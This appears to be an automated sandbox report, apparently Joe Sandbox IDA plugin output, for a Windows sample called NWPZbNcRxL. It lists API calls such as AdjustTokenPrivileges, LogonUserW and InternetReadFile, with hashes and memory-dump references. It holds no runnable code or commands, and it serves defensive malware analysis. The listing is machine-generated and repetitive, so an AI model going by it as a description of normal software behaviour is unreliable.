                                                                                                                            • API String ID: 2576544623-0
                                                                                                                            • Opcode ID: ee5ae1891d3483e0c9091010bc592878c023bf3a3bbe8865551dcd9321a5b54c
                                                                                                                            • Instruction ID: ffff89db88d2ed6d9351d78d1604a5f53796d8163a6063bb9a71b03a4003441c
                                                                                                                            • Opcode Fuzzy Hash: ee5ae1891d3483e0c9091010bc592878c023bf3a3bbe8865551dcd9321a5b54c
                                                                                                                            • Instruction Fuzzy Hash: 77519D71508301AFD310EF20DC85EAFB7E8EF99704F00492DF595962A1EB30E949EB92
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuffCharUpper
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3964851224-0
                                                                                                                            • Opcode ID: 7b9796eb140ff463d8681e67673a48e8495f24dd3e5807b4fb2d6122fa0074fb
                                                                                                                            • Instruction ID: 8ec83816773ea3a7c401f47d3bc0e6bc01f1944faf58be5f7ea98137422a83b5
                                                                                                                            • Opcode Fuzzy Hash: 7b9796eb140ff463d8681e67673a48e8495f24dd3e5807b4fb2d6122fa0074fb
                                                                                                                            • Instruction Fuzzy Hash: A5928C746083518FD724DF14C480B6AB7E1BF85304F24892EF89A8B762D771ED89DB92
                                                                                                                            APIs
                                                                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C6E628
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen
                                                                                                                            • String ID: ($|
                                                                                                                            • API String ID: 1659193697-1631851259
                                                                                                                            • Opcode ID: b5708f33918368392aebc6866dc8b0601fb9c5ef682fdc56652e07afb0950797
                                                                                                                            • Instruction ID: f331bf1721dcd2f987d68694635aaf6e496811c44356d9c77c04c2b8a52fdfd9
                                                                                                                            • Opcode Fuzzy Hash: b5708f33918368392aebc6866dc8b0601fb9c5ef682fdc56652e07afb0950797
                                                                                                                            • Instruction Fuzzy Hash: 94322679A007059FDB28CF59C48196AB7F1FF48310B15C56EE8AADB3A1E770E941CB44
                                                                                                                            APIs
                                                                                                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C8180A,00000000), ref: 00C823E1
                                                                                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00C82418
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 599397726-0
                                                                                                                            • Opcode ID: b8ea735339a5ae9e314ef359ccc9d221e2109bf8481e942e9bec809023acba40
                                                                                                                            • Instruction ID: 3f8c57eabcf3d54fb7e8636271d3fc55b57f78343de2e05f1c381104f9e000ed
                                                                                                                            • Opcode Fuzzy Hash: b8ea735339a5ae9e314ef359ccc9d221e2109bf8481e942e9bec809023acba40
                                                                                                                            • Instruction Fuzzy Hash: 3541F871504209BFEB20EE95DC89FBFB7BCEB80318F10402EF651A7150DA759E41A768
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00C7B40B
                                                                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C7B465
                                                                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00C7B4B2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1682464887-0
                                                                                                                            • Opcode ID: df7b43f5235fa8eb3d8722f635050ee484cc59204d6761af7691a888c5138bdc
                                                                                                                            • Instruction ID: ca1a654c3f50efb31203003f85b3d8a172917858be0a96c3fe1e4fd90384c9c0
                                                                                                                            • Opcode Fuzzy Hash: df7b43f5235fa8eb3d8722f635050ee484cc59204d6761af7691a888c5138bdc
                                                                                                                            • Instruction Fuzzy Hash: 6B215C35A00508EFCB00EFA5D884BEDBBB8FF49310F1480AAE905EB361CB319956DB55
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C30DB6: std::exception::exception.LIBCMT ref: 00C30DEC
                                                                                                                              • Part of subcall function 00C30DB6: __CxxThrowException@8.LIBCMT ref: 00C30E01
                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C6882B
                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C68858
                                                                                                                            • GetLastError.KERNEL32 ref: 00C68865
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1922334811-0
                                                                                                                            • Opcode ID: 3e1f1b395d773da904b0b3b87bffa64cc201741141aab86ef227c593959a4b55
                                                                                                                            • Instruction ID: 37dcf173fd9ceec79217a9cd9bf39346ed3ea90bd086863c223b0f0c05df18cb
                                                                                                                            • Opcode Fuzzy Hash: 3e1f1b395d773da904b0b3b87bffa64cc201741141aab86ef227c593959a4b55
                                                                                                                            • Instruction Fuzzy Hash: B3119DB2414204AFE728DFA4DCC5E2BB7ECEB04310B20862EE49583241EA70AC018B60
                                                                                                                            APIs
                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00C68774
                                                                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C6878B
                                                                                                                            • FreeSid.ADVAPI32(?), ref: 00C6879B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3429775523-0
                                                                                                                            • Opcode ID: 385f274a6caacc0bea90430656ee5af46be9893a17fddc523cbdbab58d84b68e
                                                                                                                            • Instruction ID: f28e4b98b37d7a5a2e2241620705b3e1fd9f606da5009e3e62da9b99390255a0
                                                                                                                            • Opcode Fuzzy Hash: 385f274a6caacc0bea90430656ee5af46be9893a17fddc523cbdbab58d84b68e
                                                                                                                            • Instruction Fuzzy Hash: 27F04975A1130CBFDF00DFF4DC89AAEBBBCEF08201F1045A9A901E2181E775AA048B50
                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C7C6FB
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C7C72B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2295610775-0
                                                                                                                            • Opcode ID: fbb86a9003fb6e6e552e1e48e18276bfe773a1e24ccd62dd1bc2247758f96326
                                                                                                                            • Instruction ID: 9f0ef7098e9b14a21ea97abda16e79106b9ecb60020cb2a0770aa9e0b03217f9
                                                                                                                            • Opcode Fuzzy Hash: fbb86a9003fb6e6e552e1e48e18276bfe773a1e24ccd62dd1bc2247758f96326
                                                                                                                            • Instruction Fuzzy Hash: A51182716006009FDB10DF29D895A6AF7E8FF45320F00C51EF9A9C7290DB30A901DB81
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00C89468,?,00C9FB84,?), ref: 00C7A097
                                                                                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00C89468,?,00C9FB84,?), ref: 00C7A0A9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorFormatLastMessage
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3479602957-0
                                                                                                                            • Opcode ID: 3eba7cb92c9ae13c1d908b7b42dce76238b982d8c098c31174c01c4906a68247
                                                                                                                            • Instruction ID: 09033ec05b4d62a47296a232bc5f4b218581a42e7ecc9a97bd68132cedff9a13
                                                                                                                            • Opcode Fuzzy Hash: 3eba7cb92c9ae13c1d908b7b42dce76238b982d8c098c31174c01c4906a68247
                                                                                                                            • Instruction Fuzzy Hash: 7CF0A03510522DBBDB21AFA4DC48FEE776CFF09361F00826AF919D7191DA309A40DBA1
                                                                                                                            APIs
                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C68309), ref: 00C681E0
                                                                                                                            • CloseHandle.KERNEL32(?,?,00C68309), ref: 00C681F2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 81990902-0
                                                                                                                            • Opcode ID: 79e261c0a22d9eee1e4541c037b6266eda80356bc57b0e65d2aa984e13a6057e
                                                                                                                            • Instruction ID: 8fd92dbd591bd7ea2568feee38d9ab12a7e3a21b546e2e2ca361c75b6a1108d1
                                                                                                                            • Opcode Fuzzy Hash: 79e261c0a22d9eee1e4541c037b6266eda80356bc57b0e65d2aa984e13a6057e
                                                                                                                            • Instruction Fuzzy Hash: 4EE0E672010510AFE7252B70FC09E7B77EDEF04310B24892DF4A5C4470DB629C91DB10
                                                                                                                            APIs
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00C38D57,?,?,?,00000001), ref: 00C3A15A
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00C3A163
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3192549508-0
                                                                                                                            • Opcode ID: 494a222a0648cce14168f1330f0500f275f8d33183b26a94f5000dcd9c738b0e
                                                                                                                            • Instruction ID: 2b1b7b08e841003e27d8b5c78594a10929d94d6b13a1f19c30996b8a74d39391
                                                                                                                            • Opcode Fuzzy Hash: 494a222a0648cce14168f1330f0500f275f8d33183b26a94f5000dcd9c738b0e
                                                                                                                            • Instruction Fuzzy Hash: 80B09231054208EBCA002BA1EC0DB8C3F68FB44BA2F404026F60DC4070CB6654A28A91
                                                                                                                            Strings
                                                                                                                            • Variable must be of type 'Object'., xrefs: 00C53E62
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Variable must be of type 'Object'.
                                                                                                                            • API String ID: 0-109567571
                                                                                                                            • Opcode ID: cadcca6ef024484817dfc497c5bd70387d295f8289a51fe7ebb403e2f6dcb76e
                                                                                                                            • Instruction ID: 254260522050af9f86aeff8acf93622cf9f34de2331f6c31cad867b07ce0679b
                                                                                                                            • Opcode Fuzzy Hash: cadcca6ef024484817dfc497c5bd70387d295f8289a51fe7ebb403e2f6dcb76e
                                                                                                                            • Instruction Fuzzy Hash: 18A26975A00215CBCB24CF59C490AEEB7B1FF5A314F248069EC16AB351D771EE86EB90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6378527684d87364da35d07a80f82d3aa18cff836760715a603a6d9ce457831c
                                                                                                                            • Instruction ID: 30ad15047e77e2c8119cdf5dfc68cc5dd2b7deab6a8151fa3570aa999d0499be
                                                                                                                            • Opcode Fuzzy Hash: 6378527684d87364da35d07a80f82d3aa18cff836760715a603a6d9ce457831c
                                                                                                                            • Instruction Fuzzy Hash: D732F471D69F014ED7279634DC32339A249AFB73D8F15DB3BE829B69A5EB28C5834100
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 85070980f6c0d752495fdff8d1882f73b0aa683463af42a2e9eaa9faa0ac510f
                                                                                                                            • Instruction ID: d0e063603effe260ab662a8cbd86ee4851cdce71517b0896af7763837ac97024
                                                                                                                            • Opcode Fuzzy Hash: 85070980f6c0d752495fdff8d1882f73b0aa683463af42a2e9eaa9faa0ac510f
                                                                                                                            • Instruction Fuzzy Hash: DFB10131D2AF404DD7639639883133ABA5CAFBB2D9F91D71BFC2675D22EB2185838141
                                                                                                                            APIs
                                                                                                                            • __time64.LIBCMT ref: 00C7889B
                                                                                                                              • Part of subcall function 00C3520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00C78F6E,00000000,?,?,?,?,00C7911F,00000000,?), ref: 00C35213
                                                                                                                              • Part of subcall function 00C3520A: __aulldiv.LIBCMT ref: 00C35233
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2893107130-0
                                                                                                                            • Opcode ID: c2c7c8c75ff53594189dc86e4962b51866b7f1e69fb9c1a6ea6cb0ac475c9d24
                                                                                                                            • Instruction ID: 8d9e2bfe0b86f434376931189b417db957195e87ff9c8c36d7d032c1a979cffe
                                                                                                                            • Opcode Fuzzy Hash: c2c7c8c75ff53594189dc86e4962b51866b7f1e69fb9c1a6ea6cb0ac475c9d24
                                                                                                                            • Instruction Fuzzy Hash: 1A21AF726356108BC729CF29D841B56B3E1EBA5321B688E6DD1F9CB2C0CA34A949CB54
                                                                                                                            APIs
                                                                                                                            • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00C74C76
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: mouse_event
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2434400541-0
                                                                                                                            • Opcode ID: 7a704c6d4e4438b9bcd57642861850a4d520bf686fab08301d5e86fdc54d48d2
                                                                                                                            • Instruction ID: 86213bd6a11700aeb5927abeeb063952c0ff89bc97c0ae3f685910e858e704d3
                                                                                                                            • Opcode Fuzzy Hash: 7a704c6d4e4438b9bcd57642861850a4d520bf686fab08301d5e86fdc54d48d2
                                                                                                                            • Instruction Fuzzy Hash: ECD05EA016260879EC2D07208E4FF7A1109E380781FC4C14A7259C90C0EBD15D40A037
                                                                                                                            APIs
                                                                                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00C68389), ref: 00C687D1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
